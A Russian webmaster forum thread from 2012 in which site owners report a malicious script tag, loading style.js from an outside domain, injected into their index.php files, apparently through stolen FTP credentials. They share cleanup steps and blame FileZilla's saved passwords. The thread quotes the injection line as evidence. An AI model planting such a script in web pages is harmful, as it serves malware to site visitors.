Вирус на сайте
Страницы: 1 2 След.
Вирус на сайте
Здравствуйте. Думаю, данную тему нужно прочитать всем, может кто-то найдёт у себя тоже подобную неприятность.И так.
Вчера Я.Вебмастер определил, что один мой сайт безопасен: появился красный значок.
Сегодня полез разбираться и обнаружил в исходном коде (который выдаёт браузер) вот такую строчку:

Код
 <script src="http://bdnbah.info/style.js"></script><script src="http://bdnbah.info/style.js"></script>


И эта строчка шла сразу же после <html>Начал смотреть другие сайты этого же хостинга (мои сайты), тоже обнаруживал эту строчку. Иногда она стояла в боди, а иногда вместо был iframe.
Проанализировав всё, пришёл к выводу, что злоумышленник получил доступ по ftp (скорее всего программа).
Ну что ж, я начал шерстить все файлы. Большинство было - движки Вордпресс. Один сайт я просмотрел полностью. Файлы определял по дате изменения. Все index были изменены 10 марта.
Вредоносная строчка дописывалась всегда в файл index.php. Удалил всё, и будут мониторить дальше. Странный джаваскрипт с сайтов пропал.
Тех, кто зайдёт в данную тему, прошу проверить парочку своих сайтов (просто html главной  страницы - это займёт у вас 5 секунд)
*Пароли естественно семенил.
Вот теперь думаю, где подхватил эту дрянь. Пару дней сидел без антивиря, быть может тогда...
О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про
Была такая же проблема. Имхо, вирус\троян украл данные от FTP из FileZilla - там они не сильно шифруются насколько я в курсе.
Цитата
Дмитрий Иванов пишет:
украл данные от FTP из FileZilla
Я так тоже подумал, ибо у меня как раз этот клиент.Я его снёс нафиг, скачал свежую версию, и сейчас буду устанавливать... Хотя теперь стоит подумать. Может, какой другой клиент установить. Вы тем же самым пользуетесь?


Цитата
Дмитрий Иванов пишет:
Была такая же проблема.
Вы её устранили и... Больше подобная весчь не появлялась?
Сегодня устранил - вычистил вредоносный код из index.php и сменил все пароли - пока полет нормальный, отправил сайты на перепроверку в яндексе - он уже успел пометить парочку как потенциально опасные.

Проблема однозначно в FileZilla - там у меня были прописаны данные от 2-х хостингов, и на обоих прописался этот вирус. На остальных хостингах никаких проблем.

FileZilla удалил, перешел на FireFTP - там все данные шифруются мастер-паролем.
Я тоже подыскиваю фтп-клиент бесплатный. На файлзиллу возваращаться желания нет однозначно smile:(

Цитата
Дмитрий Иванов пишет:
FileZilla удалил, перешел на FireFTP - там все данные шифруются мастер-паролем.

Это дополнение к мозилле или есть полноценная программа? Там соединение шифруется по умолчанию? То есть доп. настроек делать не нужно?
Дополнение. При каждом запуске спрашивает мастер пароль которым и шифруются данные от FTP. Дополнительных настроек не нужно.
Цитата
Дмитрий Иванов пишет:
Проблема однозначно в FileZilla - там у меня были прописаны данные от 2-х хостингов
Ставьте "с запросом" и не будет проблем, имейте привычку менять пароли каждую неделю
Хостинг Beget на СУПРе
Здравствуйте, мой сайт joy-game.ru/ и его отправили в АГС за эту фигню. Как её убрать? FileZill(ой) не пользовался, в начале данного скрипта нету. Помогите пожалуйста. Кстати, хочу подчеркнуть, если ввести этот код в гугл или яндекс, то на форумах, просят о помощи после 10 марта 2012 года(Что и странно). И как можно убрать?
Цитата
grant1425 пишет:
просят о помощи после 10 марта 2012 года
Да кстати. Наплыв какой-то по вирусам. Нехорошая тенденция.
grant1425, Не стал открывать сайт.... что за ПП стоят на сайте? шаб откуда? сприпты с левых доменов ставили?
Роман, сайт не изменял 4 недели или даже больше. Не чего не было и вдруг где-то числа 11 вирусняк появился
grant1425, Вирусняк на ucoze smile:confused: это только вы сами могли натворить
Изменено: Роман - 13 Марта 2012 20:49
Роман, по твоему появился скрипт и все полезли его брать? И вирусы появились...
grant1425, Я хочу сказать, это полностью ваша вина, что подхватили какую то х. Смените шаблон, убейте Гротаторы
Спасибо за тему. Долго думал где он находится. Сразу что то не догадался глянуть в index
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
17:55 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
17:04 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
15:43 Adtrafico - Правильная партнёрская сеть под бурж трафик 
12:50 Партнерская программа OWNR WALLET 
01:46 Настроить поставщиков в программе E-Trade PriceList Importer 
15:26 Найти элемент в коде 
11:51 Bropush - твой бро в монетизации сайта push-уведомлениями 
20:40 Ural-obmen.ru — выгодный сервис обмена 
20:29 Obama.ru - безопасный обмен криптовалют и электронных денежных средств 
18:15 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 
16:54 Прием платежей для HIGH RISK | Прием платежей без сайта 
16:54 Услуги рассылки Viber|Whatsapp|IMO. 
16:53 Услуги рассылки Вконтакте 
16:53 Рассылка в TELEGRAM |Большой опыт работы | Любые тематики | Лучшая конверсия 
05:21 Точные прогнозы на футбол 
16:32 Видимо, похороны СУПРа уже прошли как-то по-тихому 
12:48 Каспкрски ОС 
11:21 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
14:41 Бесплатный мини-аудит юзабилити и конверсии + технический SEO-аудит в подарок 
15:24 Добро пожаловать в цифровой мир... 
22:58 У меня дикая просадка по РСЯ за последние 3 суток